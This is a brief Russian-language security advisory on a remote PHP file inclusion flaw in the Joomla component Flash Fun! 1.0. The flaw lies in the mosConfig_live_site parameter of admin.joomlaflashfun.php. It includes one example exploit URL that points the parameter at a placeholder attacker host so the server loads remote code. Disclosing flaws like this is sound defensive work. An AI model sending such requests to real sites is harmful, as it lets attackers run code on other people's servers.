Программа: Joomla Component Flash Fun! 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mosConfig_live_site» сценарием admin.joomlaflashfun.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/ admin.joomlaflashfun.php?mosConfig_live_site=[attacker]



Оставить мнение